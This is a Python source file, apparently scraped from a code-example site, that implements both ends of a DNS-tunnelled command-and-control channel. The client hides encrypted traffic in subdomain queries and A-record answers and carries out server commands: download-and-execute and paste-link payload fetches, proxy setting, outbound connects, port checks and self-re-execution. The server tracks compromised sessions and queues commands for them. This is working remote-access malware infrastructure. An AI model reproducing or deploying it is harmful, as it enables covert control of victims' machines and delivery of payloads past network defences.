            raise ValueError('Too big page size')

        nonce = self.nonce
        parts = [
            struct.pack('>I', self.spi) if self.spi else None,
            struct.pack('>I', nonce),
            self.encoder.encode(data, nonce, symmetric=True),
        ]
        labels = [
            ''.join([self.translation[x] for x in base64.b32encode(part)])
            for part in parts if part is not None
        ]
        encoded = '.'.join(labels) + '.' + self.domain

        self.nonce += len(encoded)
        return encoded, nonce

    def _request(self, *commands):
        """Send ``commands`` in one query and return the commands answered.

        Returns an empty list on a short answer, on a socket error (which
        also rotates to the next domain) or when the reply cannot be
        unpacked even with the public-key fallback. A successful fallback
        means the server no longer knows the session, so the SPI and key
        exchange state are reset and ``on_session_lost`` is called.
        """
        parcel = Parcel(*commands)
        page, nonce = self._q_page_encoder(parcel.pack())

        try:
            _, _, addresses = socket.gethostbyname_ex(page)
            if len(addresses) < 2:
                logging.warning('DNSCNC: short answer: {}'.format(addresses))
                return []

        except socket.error as e:
            logging.error('DNSCNC: Communication error: {}'.format(e))
            self.next()
            return []

        response = None

        try:
            response = Parcel.unpack(
                self._a_page_decoder(addresses, nonce)
            )

            self.failed = 0
        except ParcelInvalidCrc:
            logging.error('CRC FAILED / Fallback to Public-key decoding')

            try:
                response = Parcel.unpack(
                    self._a_page_decoder(addresses, nonce, False)
                )

                self.spi = None
                self.encoder.kex_reset()
                self.on_session_lost()

            except (ParcelInvalidCrc, ParcelInvalidPayload) as e:
                if isinstance(e, ParcelInvalidCrc):
                    reason = 'CRC'
                else:
                    reason = 'Invalid payload'

                logging.error(
                    'CRC FAILED / Fallback failed also / {} / {}/{}'.format(
                        reason, self.failed, 5
                    )
                )
                self.failed += 1
                if self.failed > 5:
                    self.next()
                return []

        return response.commands

    def on_pastelink(self, url, action, encoder):
        """Fetch, unpack and verify paste content, then hand it to the hook.

        The body is ascii85 decoded, unpacked with ``self.encoder``,
        decompressed and split into a 20 byte SHA-1 digest plus content;
        ``on_pastelink_content`` is called only when the digest matches.

        encoder -- accepted for interface compatibility; unpacking uses
                   ``self.encoder``

        Any failure (including the fetch itself) is logged rather than
        raised, matching ``on_downloadexec``, so that one bad link does not
        abort the remaining commands of the batch.
        """
        try:
            opener = urllib2.build_opener(urllib2.ProxyHandler())
            response = opener.open(url)
            if response.code != 200:
                return

            content = response.read()
            content = ascii85.ascii85DecodeDG(content)
            content = self.encoder.unpack(content)
            content = zlib.decompress(content)
            chash, content = content[:20], content[20:]
            h = hashlib.sha1()
            h.update(content)
            if h.digest() == chash:
                self.on_pastelink_content(url, action, content)
            else:
                logging.error('PasteLink: Wrong hash after extraction: {} != {}'.format(
                    h.digest(), chash))
        except Exception as e:
            logging.exception(e)

    def on_downloadexec(self, url, action, use_proxy):
        """Download ``url`` and pass the body to ``on_downloadexec_content``.

        use_proxy -- when true the request goes through an opener built with
                     ``urllib2.ProxyHandler()``, otherwise ``urllib2.urlopen``

        Failures are logged, not raised.
        """
        if use_proxy:
            opener = urllib2.build_opener(urllib2.ProxyHandler()).open
        else:
            opener = urllib2.urlopen

        try:
            response = opener(url)
            if response.code == 200:
                self.on_downloadexec_content(url, action, response.read())

        except Exception as e:
            logging.exception(e)

    def on_pastelink_content(self, url, action, content):
        """Hook: verified paste content is available. No-op by default."""
        pass

    def on_downloadexec_content(self, url, action, content):
        """Hook: downloaded content is available. No-op by default."""
        pass

    def on_connect(self, ip, port, transport, proxy=None):
        """Hook: the server sent a Connect command. No-op by default.

        ``proxy`` receives the current ``self.proxy`` value; ``process``
        always passes it by keyword, so the parameter must be accepted.
        """
        pass

    def on_checkconnect(self, host, port_start, port_end=None):
        """Hook: the server sent a CheckConnect command. No-op by default."""
        pass

    def on_exit(self):
        """Hook: the server sent Exit; clears ``active`` so ``run`` stops."""
        self.active = False

    def on_disconnect(self):
        """Hook: the server sent a Disconnect command. No-op by default."""
        pass

    def on_error(self, error, message=None):
        """Hook: the server sent an Error command. No-op by default."""
        pass

    def on_session_established(self):
        """Hook: key exchange finished and an SPI was stored. No-op."""
        pass

    def on_session_lost(self):
        """Hook: the session state was reset after a fallback decode. No-op."""
        pass

    def on_set_proxy(self, scheme, ip, port, user, password):
        """Store the proxy setting passed on to later ``on_connect`` calls.

        An empty scheme or 'none' clears the proxy, 'any' stores ``True``,
        anything else stores a ``scheme://[user:password@]ip:port`` string.
        """
        if not scheme or scheme.lower() == 'none':
            self.proxy = None
        elif scheme.lower() == 'any':
            self.proxy = True
        else:
            if user and password:
                auth = '{}:{}@'.format(user, password)
            else:
                auth = ''

            self.proxy = '{}://{}{}:{}'.format(scheme, auth, ip, port)

    def process(self):
        """Run one poll cycle: fetch commands, acknowledge, dispatch them.

        With an established session a SystemStatus is sent, otherwise a
        Poll. The number of received commands is acknowledged before they
        are handled one by one. A failed key exchange ends the cycle early.
        """
        if self.spi:
            commands = list(self._request(SystemStatus()))
        else:
            commands = list(self._request(Poll()))

        logging.debug('commands: {}'.format(commands))
        ack = self._request(Ack(len(commands)))
        if not (len(ack) == 1 and isinstance(ack[0], Ack)):
            logging.error('ACK <-> ACK failed: received: {}'.format(ack))

        for command in commands:
            if isinstance(command, Policy):
                self.poll = command.poll

                if command.kex and not self.spi:
                    request = self.encoder.generate_kex_request()
                    kex = Kex(request)
                    response = self._request(kex)
                    if not (len(response) == 1 and isinstance(response[0], Kex)):
                        logging.error('KEX sequence failed. Got {} instead of Kex'.format(
                            response))
                        return

                    self.encoder.process_kex_response(response[0].parcel)
                    self.spi = kex.spi
                    self.on_session_established()
            elif isinstance(command, Poll):
                # Validate the reply that was just received; an empty or
                # non-Ack reply is only logged.
                ack = self._request(SystemInfo())
                if not (len(ack) == 1 and isinstance(ack[0], Ack)):
                    logging.error('SystemInfo: ACK expected but {} found'.format(
                        ack))
                ack = self._request(SystemStatus())
                if not (len(ack) == 1 and isinstance(ack[0], Ack)):
                    logging.error('SystemStatus: ACK expected but {} found'.format(
                        ack))
            elif isinstance(command, PasteLink):
                self.on_pastelink(command.url, command.action, self.encoder)
            elif isinstance(command, DownloadExec):
                self.on_downloadexec(command.url, command.action, command.proxy)
            elif isinstance(command, SetProxy):
                self.on_set_proxy(
                    command.scheme, command.ip, command.port,
                    command.user, command.password
                )
            elif isinstance(command, Connect):
                self.on_connect(
                    str(command.ip),
                    int(command.port),
                    transport=command.transport,
                    proxy=self.proxy
                )
            elif isinstance(command, Error):
                self.on_error(command.error, command.message)
            elif isinstance(command, Disconnect):
                self.on_disconnect()
            elif isinstance(command, Sleep):
                time.sleep(command.timeout)
            elif isinstance(command, CheckConnect):
                self.on_checkconnect(command.host, command.port_start, port_end=command.port_end)
            elif isinstance(command, Reexec):
                executable = os.readlink('/proc/self/exe')
                with open('/proc/self/cmdline') as cmdline:
                    raw = cmdline.read()
                # /proc/<pid>/cmdline ends with a NUL after the last
                # argument; drop it so no empty argument is appended.
                if raw.endswith('\x00'):
                    raw = raw[:-1]
                os.execv(executable, raw.split('\x00'))
            elif isinstance(command, Exit):
                self.active = False
                self.on_exit()

    def run(self):
        """Thread body: call ``process`` every ``self.poll`` seconds.

        Exceptions from a cycle are logged and the loop continues; it ends
        once ``self.active`` is false.
        """
        while True:
            try:
                self.process()
            except Exception as e:
                logging.exception(e)

            if not self.active:
                break

            logging.debug('sleep {}'.format(self.poll))
            time.sleep(self.poll)
Ejemplo n.º 8
0
class DnsCommandServerHandler(BaseResolver):
    def __init__(self, domain, key, recursor=None, timeout=None):
        """Initialise resolver state.

        domain   -- domain suffix served by this handler
        key      -- private key handed to the ECPV encoder
        recursor -- optional upstream used for names outside ``domain``
        timeout  -- session idle timeout; defaults to three poll intervals
        """
        self.sessions = {}
        # Reply cache read by resolve(); it has to exist before the first
        # query because cleanup() may not have run yet.
        self.cache = {}
        self.domain = domain
        self.recursor = recursor
        self.encoder = ECPV(private_key=key)
        # Positional inverse of the client's mapping: hostname characters
        # (a-z, '-', 0-9) back to base32 characters (A-Z, 0-9, '=').
        self.translation = dict(zip(
            'abcdefghijklmnopqrstuvwxyz' + '-' + '0123456789',
            'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + '0123456789' + '='
        ))

        self.interval = 30
        self.kex = True
        self.timeout = timeout or self.interval*3
        self.commands = []
        self.lock = RLock()
        self.finished = Event()

    def cleanup(self):
        """Periodically drop idle sessions and reset the reply cache.

        Loops until ``self.finished`` is set. On every pass, sessions whose
        ``idle`` value exceeds ``self.timeout`` are removed and the cache is
        replaced by an empty dict, all under ``self.lock``.
        """
        while not self.finished.is_set():
            with self.lock:
                expired = [
                    spi for spi, session in self.sessions.items()
                    if session.idle > self.timeout
                ]
                for spi in expired:
                    del self.sessions[spi]

                self.cache = {}

            # Wait on the event instead of sleeping so that setting
            # ``finished`` ends the loop without a full timeout delay.
            self.finished.wait(self.timeout)

    def locked(f):
        """Decorator: run the wrapped method while holding ``self.lock``."""
        @functools.wraps(f)
        def guarded(self, *args, **kwargs):
            self.lock.acquire()
            try:
                return f(self, *args, **kwargs)
            finally:
                self.lock.release()
        return guarded

    @locked
    def add_command(self, command, session=None, default=False):
        """Queue ``command`` for one, several or all sessions.

        command -- command object passed to each session's ``add_command``
        session -- SPI or node selector understood by ``find_sessions``;
                   when falsy every session returned by ``find_sessions()``
                   receives the command
        default -- also append the command to ``self.commands``

        Returns the number of sessions the command was queued for.
        """
        if default:
            self.commands.append(command)

        if not session:
            targets = self.find_sessions()
        else:
            targets = self.find_sessions(spi=session) or \
                self.find_sessions(node=session)

            if not targets:
                return 0

            # A single session object instead of a sequence.
            if type(targets) not in (list, tuple):
                targets.add_command(command)
                return 1

        queued = 0
        for target in targets:
            target.add_command(command)
            queued += 1

        return queued

    @locked
    def reset_commands(self, session=None, default=False):
        """Clear queued commands.

        session -- SPI or node selector understood by ``find_sessions``;
                   when falsy every session returned by ``find_sessions()``
                   is considered
        default -- also replace ``self.commands`` with an empty list

        Returns the number of sessions cleared. Without a selector only
        sessions that actually had queued commands are counted.
        """
        if default:
            self.commands = []

        if not session:
            cleared = 0
            for target in self.find_sessions():
                if target.commands:
                    target.commands = []
                    cleared += 1
            return cleared

        targets = self.find_sessions(spi=session) or \
            self.find_sessions(node=session)

        if not targets:
            return 0

        # A single session object instead of a sequence.
        if type(targets) not in (list, tuple):
            targets.commands = []
            return 1

        cleared = 0
        for target in targets:
            target.commands = []
            cleared += 1

        return cleared

    @locked
    def find_sessions(self, spi=None, node=None):
        """Return the sessions matching ``spi`` or ``node``.

        spi  -- int, or a string of comma separated hexadecimal SPIs
        node -- int, or a string of comma separated hexadecimal node ids

        ``spi`` takes precedence over ``node``. Without any selector all
        sessions whose ``system_info`` is not None are returned. Node
        matching compares against ``session.system_info['node']``.
        """
        if spi:
            kind = type(spi)
            if kind in (str, unicode):
                spi = [int(token, 16) for token in spi.split(',')]
            elif kind == int:
                spi = [spi]

        if node:
            kind = type(node)
            if kind in (str, unicode):
                node = [int(token, 16) for token in node.split(',')]
            elif kind == int:
                node = [node]

        if spi:
            return [
                self.sessions.get(wanted) for wanted in spi
                if wanted in self.sessions
            ]

        if node:
            matches = []
            for candidate in self.sessions.itervalues():
                info = candidate.system_info
                if info and info['node'] in set(node):
                    matches.append(candidate)
            return matches

        return [
            candidate for candidate in self.sessions.itervalues()
            if candidate.system_info is not None
        ]

    @locked
    def set_policy(self, kex=True, timeout=None, interval=None, node=None):
        """Change the poll policy and queue a Policy command announcing it.

        kex      -- whether clients should perform key exchange
        timeout  -- session timeout
        interval -- poll interval; values below 30 are rejected
        node     -- SPI or node selector; together with ``interval`` or
                    ``timeout`` it limits the change to the first matching
                    session, otherwise the handler-wide settings change

        Returns the result of ``add_command`` (number of sessions the
        Policy was queued for), or None when all three values already equal
        the current settings.
        Raises ValueError for an interval below 30.
        """
        # Nothing to do when the requested values equal the current ones.
        # Compare the *argument* with the stored interval; comparing the
        # attribute with itself would always be true.
        if kex == self.kex and timeout == self.timeout and interval == self.interval:
            return

        if interval and interval < 30:
            raise ValueError('Interval should not be less then 30s to avoid DNS storm')

        if node and (interval or timeout):
            session = self.find_sessions(
                spi=node) or self.find_sessions(node=node)

            if session:
                session = session[0]

                if interval:
                    session.timeout = (interval*3)
                else:
                    interval = self.interval

                # An explicit timeout overrides the one derived above.
                if timeout:
                    session.timeout = timeout

                if kex is None:
                    kex = self.kex

        else:
            self.interval = interval or self.interval
            # Never let the timeout drop below three poll intervals.
            self.timeout = max(timeout if timeout else self.timeout, self.interval*3)
            self.kex = kex if ( kex is not None ) else self.kex

            interval = self.interval
            timeout = self.timeout
            kex = self.kex

        cmd = Policy(interval, kex)
        return self.add_command(cmd, session=node)

    @locked
    def encode_pastelink_content(self, content):
        """Wrap ``content`` for publication as a paste.

        The SHA-1 digest is prepended, the result is zlib-compressed at
        level 9, packed with ``self.encoder`` and finally ascii85 encoded.
        """
        digest = hashlib.sha1(content).digest()
        compressed = zlib.compress(digest + content, 9)
        packed = self.encoder.pack(compressed)
        return ascii85.ascii85EncodeDG(packed)

    def on_connect(self, info):
        """Hook for subclasses; does nothing by default.

        It is not invoked anywhere in the visible part of this class.
        """

    def on_keep_alive(self, info):
        """Hook for subclasses; does nothing by default.

        ``_cmd_processor`` calls it with ``session.system_info`` when a
        session that has system info sends Poll, SystemStatus or Ack.
        """

    def on_exit(self, info):
        """Hook for subclasses; does nothing by default.

        ``_cmd_processor`` calls it with ``session.system_info`` when a
        session that has system info sends Exit.
        """

    def _a_page_encoder(self, data, encoder, nonce):
        """Encode ``data`` and spread it over a list of A resource records.

        The encoded payload is prefixed with a one byte length and cut into
        three byte chunks. Each chunk becomes one IPv4 address laid out as:
        bits 29-31 a random value in 1..6, bits 25-28 the chunk index,
        bits 1-24 the chunk, and bit 0 set only when bits 1-2 are both
        clear. A short last chunk is padded with a random byte.

        data    -- payload to encode
        encoder -- encoder to use; symmetric mode follows its
                   ``kex_completed`` value
        nonce   -- nonce of the request being answered

        Returns a list of ``RR`` objects.
        Raises ValueError when length byte plus payload exceed 48 bytes,
        the most a 4-bit index of three byte chunks can address.
        """
        data = encoder.encode(data, nonce, symmetric=encoder.kex_completed)

        payload = struct.pack('B', len(data)) + data

        if len(payload) > 48:
            raise ValueError(
                'Page size more than 48 bytes ({})'.format(len(payload)))

        response = []
        chunks = [payload[i:i+3] for i in xrange(0, len(payload), 3)]

        for idx, part in enumerate(chunks):
            header = random.randint(1, 6) << 29
            position = idx << 25
            # The random byte is drawn for every chunk, even when no
            # padding is needed, exactly as before.
            filler = chr(random.randrange(0, 255)) * (3 - len(part))
            bits = struct.unpack('>I', '\x00' + part + filler)[0] << 1
            flag = int(not bool(bits & 6))
            packed = struct.unpack(
                '!BBBB', struct.pack('>I', header | position | bits | flag))
            address = '.'.join(['{}'.format(int(x)) for x in packed])
            response.append(RR('.', QTYPE.A, rdata=A(address), ttl=600))

        return response

    def _q_page_decoder(self, data):
        """Decode a query name into ``(payload, session, nonce)``.

        The labels left after stripping ``self.domain`` are interpreted as
        follows: a single label starting with 'ping' raises DnsPingRequest
        (15 for a bare 'ping', otherwise the number following it); two
        labels are nonce and payload decoded with the handler's own
        encoder; three labels are SPI, nonce and payload decoded with the
        encoder of that session.

        Raises DnsNoCommandServerException for any other label count and
        DnsCommandServerException('NO_SESSION', nonce) for an unknown SPI.
        """
        labels = data.stripSuffix(self.domain).idna()[:-1].split('.')
        count = len(labels)

        if count == 0:
            raise DnsPingRequest(1)

        if count == 1 and labels[0].startswith('ping'):
            if len(labels[0]) == 4:
                raise DnsPingRequest(15)
            raise DnsPingRequest(int(labels[0][4:]))

        if count not in (2, 3):
            raise DnsNoCommandServerException()

        # Undo the hostname alphabet translation, then base32 decode.
        decoded = []
        for label in labels:
            b32 = ''.join([self.translation[char] for char in label])
            decoded.append(base64.b32decode(b32))

        session = None

        if count == 2:
            nonce, data = decoded
            nonce = struct.unpack('>I', nonce)[0]
            encoder = self.encoder
        else:
            spi, nonce, data = decoded
            spi = struct.unpack('>I', spi)[0]
            nonce = struct.unpack('>I', nonce)[0]
            with self.lock:
                if spi not in self.sessions:
                    raise DnsCommandServerException('NO_SESSION', nonce)
                session = self.sessions[spi]
            encoder = session.encoder

        return encoder.decode(data, nonce, symmetric=True), session, nonce


    def _cmd_processor(self, command, session):
        """Handle one client command and return the list of replies.

        command -- decoded command object
        session -- session the query belongs to, or None when the query
                   carried no SPI

        Sessionless Poll returns the current Policy followed by Poll;
        sessionless Ack is answered with Ack. Exit removes the session (if
        any) and is echoed. Poll/SystemStatus within a session return the
        session's queued commands; Ack within a session drops the
        acknowledged number of queued commands. SystemInfo stores the
        client info. Kex creates the session on first use and returns the
        key exchange response. Anything else yields Error('NO_POLICY').
        """
        logging.debug('dnscnc:commands={} session={}'.format(command, session))

        if isinstance(command, Poll) and session is None:
            return [Policy(self.interval, self.kex), Poll()]

        elif isinstance(command, Ack) and (session is None):
            return [Ack()]

        elif isinstance(command, Exit):
            if session and session.system_info:
                self.on_exit(session.system_info)

            # An Exit may arrive without a session, and the session may
            # already have been removed by cleanup(); neither case should
            # raise.
            if session is not None:
                with self.lock:
                    self.sessions.pop(session.spi, None)

            return [Exit()]

        elif (
                isinstance(command, Poll) or isinstance(command, SystemStatus)
            ) and (session is not None):
            if session.system_info:
                self.on_keep_alive(session.system_info)

            if isinstance(command, SystemStatus):
                session.system_status = command.get_dict()

            commands = session.commands
            return commands

        elif isinstance(command, Ack) and (session is not None):
            if session.system_info:
                self.on_keep_alive(session.system_info)

            if command.amount > len(session.commands):
                logging.info('ACK: invalid amount of commands: {} > {}'.format(
                    command.amount, len(session.commands)))
            session.commands = session.commands[command.amount:]
            return [Ack()]

        elif isinstance(command, SystemInfo) and session is not None:
            session.system_info = command.get_dict()
            return [Ack()]

        elif isinstance(command, Kex):
            with self.lock:
                if not command.spi in self.sessions:
                    self.sessions[command.spi] = Session(
                        command.spi,
                        self.encoder.clone(),
                        self.commands,
                        self.timeout
                    )

                encoder = self.sessions[command.spi].encoder
                response, key = encoder.process_kex_request(command.parcel)
                # NOTE(review): this writes key material to the debug log;
                # confirm that is acceptable for production log levels.
                logging.debug('dnscnc:kex:key={}'.format(binascii.b2a_hex(key[0])))

            return [Kex(response)]
        else:
            return [Error('NO_POLICY')]

    def resolve(self, request, handler):
        """Answer a DNS request, serving repeated names from the cache.

        Queries of any type other than A get an NXDOMAIN reply. For A
        queries the name with ``self.domain`` stripped is the cache key: a
        cached reply is returned with its header id rewritten to the id of
        the current request, otherwise ``_resolve`` produces the reply and
        it is cached. Cache access happens under ``self.lock``.
        """
        qtype = request.q.qtype
        if qtype != QTYPE.A:
            reply = request.reply()
            reply.header.rcode = RCODE.NXDOMAIN
            logging.debug('Request unknown qtype: {}'.format(QTYPE.get(qtype)))
            return reply

        with self.lock:
            key = request.q.qname.stripSuffix(self.domain).idna()[:-1]

            try:
                cached = self.cache[key]
            except KeyError:
                pass
            else:
                cached.header.id = request.header.id
                return cached

            fresh = self._resolve(request, handler)
            self.cache[key] = fresh
            return fresh

    def _resolve(self, request, handler):
        qname = request.q.qname
        reply = request.reply()

        # TODO:
        # Resolve NS?, DS, SOA somehow
        if not qname.matchSuffix(self.domain):
            if self.recursor:
                try:
                    return DNSRecord.parse(request.send(self.recursor, timeout=2))
                except socket.error:
                    pass
                except Exception as e:
                    logging.exception('DNS request forwarding failed')

            reply.header.rcode = RCODE.NXDOMAIN
            return reply

        responses = []

        session = None
        nonce = None

        try:
            request, session, nonce = self._q_page_decoder(qname)
            if session and session.last_nonce and session.last_qname:
                if nonce < session.last_nonce:
                    logging.info('Ignore nonce from past: {} < {}'.format(
                        nonce, session.last_nonce))
                    reply.header.rcode = RCODE.NXDOMAIN
                    return reply
                elif session.last_nonce == nonce and session.last_qname != qname:
                    logging.info('Last nonce but different qname: {} != {}'.format(
                        session.last_qname, qname))
                    reply.header.rcode = RCODE.NXDOMAIN
                    return reply

            for command in Parcel.unpack(request):
                for response in self._cmd_processor(command, session):
                    responses.append(response)

            if session:
                session.last_nonce = nonce
                session.last_qname = qname

        except DnsCommandServerException as e:
            nonce = e.nonce
            responses = [e.error, Policy(self.interval, self.kex), Poll()]

        except ParcelInvalidCrc as e:
            responses = [e.error]

        except DnsNoCommandServerException:
            reply.header.rcode = RCODE.NXDOMAIN
            return reply

        except DnsPingRequest, e:
            for i in xrange(e.args[0]):
                x = (i % 65536) >> 8
                y = i % 256
                a = RR('.', QTYPE.A, rdata=A('127.0.{}.{}'.format(x, y)), ttl=10)
                a.rname = qname
                reply.add_answer(a)

            return reply

        except TypeError:
            # Usually - invalid padding
            reply.header.rcode = RCODE.NXDOMAIN
            return reply